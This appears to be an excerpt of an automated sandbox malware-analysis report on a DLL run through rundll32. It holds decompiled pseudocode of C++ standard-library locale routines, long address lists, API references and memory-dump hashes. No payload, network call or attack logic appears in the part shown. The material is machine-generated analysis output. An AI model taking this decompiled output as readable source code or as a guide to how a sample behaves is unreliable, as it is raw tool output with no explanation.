													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E206FD3(__eflags, _t227);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e2c6dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E206FD3(__eflags, _t226);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e2c6dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E206FD3(__eflags, _t225);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e2c6de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6e20f9f1
0x6e20f9f1
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa22
0x6e20fa27
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f

APIs

__EH_prolog3.LIBCMT ref: 6E20F9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FA02
int.LIBCPMT ref: 6E20FA19

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

numpunct.LIBCPMT ref: 6E20FA3C
std::_Facet_Register.LIBCPMT ref: 6E20FA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FA91

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
Instruction ID: 25cf433e70bb9b3bbb59fe7f14114457af90a7abe063d505dcdecc3cddb429a5
Opcode Fuzzy Hash: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
Instruction Fuzzy Hash: 6911E37990052E8BCF00DBE4CC94AEEB77BAF44B14F244908E4116B2D0DFB49A45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F60D, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t506 - 0x14, 0);
				_t483 =  *0x6e2c6df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6E1E161C(0x6e2c6da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6E2066BA(_t506 - 0x14);
					return E6E220075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6E2111AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t506 - 0x20);
							E6E223D74(_t506 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t471, _t483, 0x14);
							E6E206653(_t506 - 0x14, 0);
							_t484 =  *0x6e2c6dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6E1E161C(0x6e2c6d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6E2066BA(_t506 - 0x14);
								return E6E220075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6E211230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t506 - 0x20);
										E6E223D74(_t506 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t358, _t472, _t484, 0x14);
										E6E206653(_t506 - 0x14, 0);
										_t485 =  *0x6e2c6dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6E1E161C(0x6e2c6d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6E2066BA(_t506 - 0x14);
											return E6E220075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6E2112B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t506 - 0x20);
													E6E223D74(_t506 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t358, _t473, _t485, 0x14);
													E6E206653(_t506 - 0x14, 0);
													_t486 =  *0x6e2c6dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6E1E161C(0x6e2c6d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6E2066BA(_t506 - 0x14);
														return E6E220075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6E211339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t506 - 0x20);
																E6E223D74(_t506 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t358, _t474, _t486, 0x14);
																E6E206653(_t506 - 0x14, 0);
																_t487 =  *0x6e2c6db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6E1E161C(0x6e2c6d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6E2066BA(_t506 - 0x14);
																	return E6E220075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6E2113A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t506 - 0x20);
																			E6E223D74(_t506 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t358, _t475, _t487, 0x14);
																			E6E206653(_t506 - 0x14, 0);
																			_t488 =  *0x6e2c6ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6E1E161C(0x6e2c6d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6E2066BA(_t506 - 0x14);
																				return E6E220075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6E211409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t506 - 0x20);
																						E6E223D74(_t506 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t358, _t476, _t488, 0x14);
																						E6E206653(_t506 - 0x14, 0);
																						_t489 =  *0x6e2c6de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6E1E161C(0x6e2c6d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6E2066BA(_t506 - 0x14);
																							return E6E220075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6E211471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t506 - 0x20);
																									E6E223D74(_t506 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t358, _t477, _t489, 0x14);
																									E6E206653(_t506 - 0x14, 0);
																									_t490 =  *0x6e2c6dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6E1E161C(0x6e2c6da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6E2066BA(_t506 - 0x14);
																										return E6E220075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6E2114EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t506 - 0x20);
																												E6E223D74(_t506 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t358, _t478, _t490, 0x14);
																												E6E206653(_t506 - 0x14, 0);
																												_t491 =  *0x6e2c6dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6E1E161C(0x6e2c6d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6E2066BA(_t506 - 0x14);
																													return E6E220075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6E211558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t506 - 0x20);
																															E6E223D74(_t506 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t358, _t479, _t491, 0x14);
																															E6E206653(_t506 - 0x14, 0);
																															_t492 =  *0x6e2c6e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6E1E161C(0x6e2c6dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6E2066BA(_t506 - 0x14);
																																return E6E220075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6E2115C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t506 - 0x20);
																																		E6E223D74(_t506 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t358, _t480, _t492, 0x14);
																																		E6E206653(_t506 - 0x14, 0);
																																		_t493 =  *0x6e2c6dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6E1E161C(0x6e2c6d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6E2066BA(_t506 - 0x14);
																																			return E6E220075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6E21162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6E1E1438(_t435);
																																					E6E223D74(_t506 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e26851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6e26c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6E21542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6E220075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6E206FD3(__eflags, _t481);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6e2c6dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6E206FD3(__eflags, _t480);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6e2c6e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6E206FD3(__eflags, _t479);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6e2c6dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6E206FD3(__eflags, _t478);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6e2c6dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6E206FD3(__eflags, _t477);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6e2c6de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6E206FD3(__eflags, _t476);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6e2c6ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6E206FD3(__eflags, _t475);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6e2c6db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6E206FD3(__eflags, _t474);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6e2c6dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6E206FD3(__eflags, _t473);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6e2c6dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6E206FD3(__eflags, _t472);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6e2c6dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6E206FD3(__eflags, _t471);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6e2c6df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

0x6e20f60d
0x6e20f60d
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f63e
0x6e20f643
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
0x6e20f662
0x6e20f69f
0x6e20f6ad
0x6e20f6b2
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e9
0x6e20f6eb
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
